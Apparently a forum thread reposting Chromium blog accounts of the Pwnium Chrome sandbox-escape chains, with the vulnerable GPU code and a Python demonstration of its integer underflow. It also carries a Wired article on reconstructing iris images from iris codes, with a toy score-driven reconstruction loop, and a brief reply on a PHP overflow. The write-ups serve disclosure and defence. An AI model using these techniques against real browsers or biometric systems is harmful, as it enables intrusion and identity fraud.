The exploit became extremely creative at this point. To get around the defenses, the compromised chrome://chromewebdata origin opened a window to chrome://net-internals, which had an iframe in its structure. Another WebKit bug -- the ability to replace a cross-origin iframe (117583) -- was used to run script that navigated the popped-up window, simply “back” to chrome://net-internals (117417). This caused the browser to reassess the chrome://net-internals URL as a top-level navigation -- granting limited WebUI permissions to the backing process as a side-effect (117418). The exploit was still far from done. It was now running JavaScript inside an iframe inside a process with limited WebUI permissions. It then popped up an about:blank window and abused another bug (118467) -- this time in the JavaScript bindings -- to confuse the top-level chrome://net-internals page into believing that the new blank window was a direct child. The blank window could then navigate its new “parent” without losing privileges (113496). The first navigation was to chrome://downloads, which gained access to additional privileged APIs. You probably get a sense of where the exploit was headed now. It finished off by abusing privileged JavaScript APIs to download an attack DLL.
The same APIs were used to cleverly “download” and run wordpad.exe from the local disk (thus avoiding the system-level prompt for executing downloads from the internet zone). A design quirk of the Windows operating system caused the attack DLL to be loaded into the trusted executable. As you can imagine, it took us some time to dissect all of this. Distilling the details into a blog post was a further challenge; we’ve glossed over the use of the UXSS bug to bypass pop-up window restrictions. The UXSS bug was actually used three separate times in the exploit. We also omitted details of various other lockdowns we applied in response to the exploit chain. What’s clear is that Sergey certainly earned his $60k Pwnium reward. He chained together a whopping 14 bugs, quirks and missed hardening opportunities. Looking beyond the monetary prize, Sergey has helped make Chromium significantly safer. Besides fixing the array of bugs, we’ve landed hardening measures that will make it much tougher to abuse chrome:// WebUI pages in the future. Posted by Ken Buchanan, Chris Evans, Charlie Reis and Tom Sepez, Software Engineers Sursa: Chromium Blog: A Tale Of Two Pwnies (Part 2)
-
[h=3]A Tale of Two Pwnies (Part 1)[/h]Tuesday, May 22, 2012 Just over two months ago, Chrome sponsored the Pwnium browser hacking competition. We had two fantastic submissions, and successfully blocked both exploits within 24 hours of their unveiling. Today, we’d like to offer an inside look into the exploit submitted by Pinkie Pie. So, how does one get full remote code execution in Chrome? In the case of Pinkie Pie’s exploit, it took a chain of six different bugs in order to successfully break out of the Chrome sandbox. Pinkie’s first bug (117620) used Chrome’s prerendering feature to load a Native Client module on a web page. Prerendering is a performance optimization that lets a site provide hints for Chrome to fetch and render a page before the user navigates to it, making page loads seem instantaneous. To avoid sound and other nuisances from preloaded pages, the prerenderer blocks plug-ins from running until the user chooses to navigate to the page. Pinkie discovered that navigating to a pre-rendered page would inadvertently run all plug-ins—even Native Client plug-ins, which are otherwise permitted only for installed extensions and apps. Of course, getting a Native Client plug-in to execute doesn’t buy much, because the Native Client process’ sandbox is even more restrictive than Chrome’s sandbox for HTML content. What Native Client does provide, however, is a low-level interface to the GPU command buffers, which are used to communicate accelerated graphics operations to the GPU process. 
This allowed Pinkie to craft a special command buffer to exploit the following integer underflow bug (117656) in the GPU command decoding:

static uint32 ComputeMaxResults(size_t size_of_buffer) {
  return (size_of_buffer - sizeof(uint32)) / sizeof(T);
}

The issue here is that if size_of_buffer is smaller than sizeof(uint32), the result would be a huge value, which was then used as input to the following function:

static size_t ComputeSize(size_t num_results) {
  return sizeof(T) * num_results + sizeof(uint32);
}

This calculation then overflowed and made the result of this function zero, instead of a value at least equal to sizeof(uint32). Using this, Pinkie was able to write eight bytes of his choice past the end of his buffer. The buffer in this case is one of the GPU transfer buffers, which are mapped in both processes’ address spaces and used to transfer data between the Native Client and GPU processes. The Windows allocator places the buffers at relatively predictable locations; and the Native Client process can directly control their size as well as certain object allocation ordering. So, this afforded quite a bit of control over exactly where an overwrite would occur in the GPU process. The next thing Pinkie needed was a target that met two criteria: it had to be positioned within range of his overwrite, and the first eight bytes needed to be something worth changing. For this, he used the GPU buckets, which are another IPC primitive exposed from the GPU process to the Native Client process. The buckets are implemented as a tree structure, with the first eight bytes containing pointers to other nodes in the tree. By overwriting the first eight bytes of a bucket, Pinkie was able to point it to a fake tree structure he created in one of his transfer buffers. Using that fake tree, Pinkie could read and write arbitrary addresses in the GPU process.
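On a 32-bit build, both size_t and uint32 wrap modulo 2^32, which is exactly what chains the two calculations together. A quick Python simulation of the arithmetic (masking to 32 bits to mimic the C behavior, and assuming sizeof(T) == 4) shows the whole chain: a too-small buffer underflows into a huge result count, which in turn makes the size computation wrap to zero:

```python
MASK32 = 0xFFFFFFFF    # simulate 32-bit size_t/uint32 wraparound
SIZEOF_UINT32 = 4
SIZEOF_T = 4           # assumption: a 4-byte result element type

def compute_max_results(size_of_buffer):
    # (size_of_buffer - sizeof(uint32)) / sizeof(T) in unsigned 32-bit math
    return ((size_of_buffer - SIZEOF_UINT32) & MASK32) // SIZEOF_T

def compute_size(num_results):
    # sizeof(T) * num_results + sizeof(uint32), also wrapping at 2**32
    return (SIZEOF_T * num_results + SIZEOF_UINT32) & MASK32

n = compute_max_results(0)   # buffer smaller than sizeof(uint32) underflows
print(hex(n))                # 0x3fffffff -- the "huge value"
print(compute_size(n))       # 0 -- wraps to zero instead of at least sizeof(uint32)
```

With the computed size at zero, the subsequent bounded writes land past the end of the undersized transfer buffer, which is the eight-byte out-of-bounds write the exploit builds on.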
Combined with some predictable addresses in Windows, this allowed him to build a ROP chain and execute arbitrary code inside the GPU process. The GPU process is still sandboxed well below a normal user, but it’s not as strongly sandboxed as the Native Client process or the HTML renderer. It has some rights, such as the ability to enumerate and connect to the named pipes used by Chrome’s IPC layer. Normally this wouldn’t be an issue, but Pinkie found that there’s a brief window after Chrome spawns a new renderer where the GPU process could see the renderer’s IPC channel and connect to it first, allowing the GPU process to impersonate the renderer (bug 117627). Even though Chrome’s renderers execute inside a stricter sandbox than the GPU process, there is a special class of renderers that have IPC interfaces with elevated permissions. These renderers are not supposed to be navigable by web content, and are used for things like extensions and settings pages. However, Pinkie found another bug (117417) that allowed an unprivileged renderer to trigger a navigation to one of these privileged renderers, and used it to launch the extension manager. So, all he had to do was jump on the extension manager’s IPC channel before it had a chance to connect. Once he was impersonating the extensions manager, Pinkie used two more bugs to finally break out of the sandbox. The first bug (117715) allowed him to specify a load path for an extension from the extension manager’s renderer, something only the browser should be allowed to do. The second bug (117736) was a failure to prompt for confirmation prior to installing an unpacked NPAPI plug-in extension. With these two bugs Pinkie was able to install and run his own NPAPI plug-in that executed outside the sandbox at full user privilege. So, that’s the long and impressive path Pinkie Pie took to crack Chrome. 
All the referenced bugs were fixed some time ago, but some are still restricted to ensure our users and Chromium embedders have a chance to update. However, we’ve included links so when we do make the bugs public, anyone can investigate in more detail. In an upcoming post, we’ll explain the details of Sergey Glazunov’s exploit, which relied on roughly 10 distinct bugs. While these issues are already fixed in Chrome, some of them impact a much broader array of products from a range of companies. So, we won’t be posting that part until we’re comfortable that all affected products have had an adequate time to push fixes to their users. Posted by Jorge Lucangeli Obes and Justin Schuh, Software Engineers Sursa: Chromium Blog: A Tale of Two Pwnies (Part 1)
-
[h=1]Reverse-Engineered Irises Look So Real, They Fool Eye-Scanners[/h]By Kim Zetter July 25, 2012 Researchers reverse-engineered iris codes to create synthetic eye images that tricked an iris-recognition system into thinking they were authentic. Can you tell if this is the real image or the synthetic one? All images courtesy of Javier Galbally LAS VEGAS — Remember that scene in Minority Report when the spider robots stalk Tom Cruise to his apartment and scan his iris to identify him? Things could have turned out so much better for Cruise had he been wearing a pair of contact lenses embossed with an image of someone else’s iris. New research being released this week at the Black Hat security conference by academics in Spain and the U.S. may make that possible. The academics have found a way to recreate iris images that match digital iris codes that are stored in databases and used by iris-recognition systems to identify people. The replica images, they say, can trick commercial iris-recognition systems into believing they’re real images and could help someone thwart identification at border crossings or gain entry to secure facilities protected by biometric systems. The work goes a step beyond previous work on iris-recognition systems. Previously, researchers have been able to create wholly synthetic iris images that had all of the characteristics of real iris images — but weren’t connected to real people. The images were able to trick iris-recognition systems into thinking they were real irises, though they couldn’t be used to impersonate a real person. But this is the first time anyone has essentially reverse-engineered iris codes to create iris images that closely match the eye images of real subjects, creating the possibility of stealing someone’s identity through their iris. 
“The idea is to generate the iris image, and once you have the image you can actually print it and show it to the recognition system, and it will say ‘okay, this is the guy,’” says Javier Galbally, who conducted the research with colleagues at the Biometric Recognition Group-ATVS, at the Universidad Autonoma de Madrid, and researchers at West Virginia University.

Or is this? Is this real?

Iris-recognition systems are rapidly growing in use around the world among law enforcement agencies and the commercial sector. They’re touted as faster, more sanitary and more accurate than fingerprint systems. Fingerprint systems measure about 20-40 points for matching while iris recognition systems measure about 240 points. Schiphol Airport in the Netherlands allows travelers to enter the country without showing a passport if they participate in its Privium iris recognition program. When travelers enroll in the program, their eyes are scanned to produce binary iris codes that are stored on a Privium card. At the border crossing, the details on the card are matched to a scan taken of the cardholder’s eye to allow the person passage. Since 2004, airports in the United Kingdom have allowed travelers registered in its iris-recognition program to pass through automated border gates without showing a passport, though authorities recently announced they were dropping the program because passengers had trouble properly aligning their eyes with the scanner to get automated gates to open. Google also uses iris scanners, along with other biometric systems, to control access to some of its data centers. And the FBI is currently testing an iris-recognition program on federal prison inmates in 47 states. Inmate iris scans are stored in a database managed by a private firm named BI2 Technologies and will be part of a program aimed at quickly identifying repeat offenders when they’re arrested as well as suspects who provide false identification.
When someone participates in an iris-recognition system, his or her eyes are scanned to create iris codes, which are binary representations of the image. The iris code, which consists of about 5,000 bits of data, is then stored in a database for matching. The iris code is stored instead of the iris image for security and privacy reasons. When that person later goes before an iris-recognition scanner – to obtain access to a facility, to cross a border or to access a computer, for example – their iris is scanned and measured against the iris code stored in the database to authenticate the person’s identity. It’s long been believed that it wasn’t possible to reconstruct the original iris image from an iris code stored in a database. In fact, BI2 Technologies says on its web site that biometric templates “cannot be reconstructed, decrypted, reverse-engineered or otherwise manipulated to reveal a person’s identity. In short, biometrics can be thought of as a very secure key: Unless a biometric gate is unlocked by using the right key, no one can gain access to a person’s identity.” But the researchers showed that this is not always the case.

And this? What about this?

Their research involved taking iris codes that had been created from real eye scans as well as synthetic iris images created wholly by computers and modifying the latter until the synthetic images matched real iris images. The researchers used a genetic algorithm to achieve their results. Genetic algorithms are tools that improve results over several iterations of processing data. In this case, the algorithm examined the synthetic images against the iris code and altered the images until it achieved one that would produce a near-identical iris code to the original iris image when scanned.
“At each iteration it uses the synthetic images of the previous iteration to produce a new set of synthetic iris images that have an iris code which is more similar (than the synthetic images of the previous iteration) to the iris code being reconstructed,” Galbally says. It takes the algorithm between 100-200 iterations to produce an iris image that is “sufficiently similar” to one the researchers are trying to reproduce. Since no two images of the same iris produce the same iris code, iris recognition systems use a “similarity score” to match an image to the iris code. The owner of the scanner can set a threshold that determines how similar an image needs to be to the iris code to call it a match. The genetic algorithm examines the similarity score given by the recognition system after each iteration and then improves the next iteration to obtain a better score. “The genetic algorithm applies four … rules inspired by natural evolution to combine the synthetic iris images of one iteration in such a way … that they produce new and better synthetic iris images in the next generation — the same way that natural species evolve from generation to generation to adapt better to their habitat but in this case it is a little bit faster and we don't have to wait millions of years, just a few minutes,” Galbally says. Galbally says it takes about 5-10 minutes to produce an iris image that matches an iris code. He noted, though, that about 20 percent of the iris codes they attempted to recreate were resistant to the attack. He thinks this may be due to the algorithm settings.
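The feedback loop Galbally describes can be illustrated with a much-simplified stand-in: treat the matcher's similarity score as a black box and evolve a candidate toward a target iris code. The real attack evolves synthetic iris images and uses crossover over a population; the sketch below instead mutates a bare 256-bit code directly, which is enough to show how score feedback alone drives the reconstruction:

```python
import random

def similarity(candidate, target):
    # Stand-in for the scanner's matcher: fraction of iris-code bits that agree.
    return sum(a == b for a, b in zip(candidate, target)) / len(target)

def evolve(target, offspring=20, generations=300):
    """(1+lambda)-style evolution: keep the best candidate so far, try
    mutated copies each generation, and accept any child that the
    matcher scores higher -- the score is the only feedback used."""
    best = [random.randint(0, 1) for _ in range(len(target))]
    for _ in range(generations):
        for _ in range(offspring):
            child = best[:]
            child[random.randrange(len(child))] ^= 1   # flip one bit
            if similarity(child, target) > similarity(best, target):
                best = child
    return best

target_code = [random.randint(0, 1) for _ in range(256)]  # the stored template
fake = evolve(target_code)
print(similarity(fake, target_code))  # climbs well past a typical match threshold
```

Even this crude loop converges in a few thousand score queries; the paper's genetic algorithm does the same hill-climbing in image space, which is why 100-200 iterations suffice.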
VeriEye’s algorithm is licensed to makers of iris-recognition systems and recently ranked among the top four in accuracy out of 86 algorithms tested in a competition by the National Institute of Standards and Technology. A Neurotechnology spokeswoman said there are currently 30-40 products using VeriEye technology and more are in development. The iris codes the researchers used came from the BioSecure database, a database of multiple kinds of biometric data collected from 1,000 subjects in Europe for research use by academics and others. The synthetic images were obtained from a database developed at West Virginia University. After the researchers had successfully tricked the VeriEye system, they wanted to see how the reconstructed images would fare against real people. So they showed 50 real iris images and 50 images reconstructed from iris codes to two groups of people — those who have expertise in biometrics and those who are untrained in the field. The images tricked the experts only 8 percent of the time, but the non-experts were tricked 35 percent of the time on average, a rate that is very high given there is a 50/50 chance of guessing correctly. It should be noted that even with their high rate of error, the non-expert group still scored better than the VeriEye algorithm. The study assumes that someone conducting this kind of attack would have access to iris codes in the first place. But this might not be so hard to achieve if an attacker can trick someone into having their iris scanned or hacks into a database containing iris codes, such as the one that BI2 Technologies maintains for the FBI. BI2 states on its web site that the iris images in its database are “encrypted using strong cryptographic algorithms to secure and protect them,” but the company could not be reached to obtain details about how exactly it secures these images. Even if BI2's database is secure, other databases containing iris codes may not be.
Solution: The picture at the top of the post is a synthetic iris image. In the first set of images below that, the one on the left is real, the other synthetic. In the second set of images, the one on left is real, the one on right synthetic. And this final one? Authentic. Look hard, and you can even see the contact lens surrounding the iris. Sursa: Reverse-Engineered Irises Look So Real, They Fool Eye-Scanners | Threat Level | Wired.com
-
PHP 6.0 openssl_verify() Local Buffer Overflow PoC
Nytro replied to DarkyAngel's topic in Exploituri
EIP 00410041
Suspicious; it might be exploitable, but what are those 0s between each character? Looks like a stack overflow.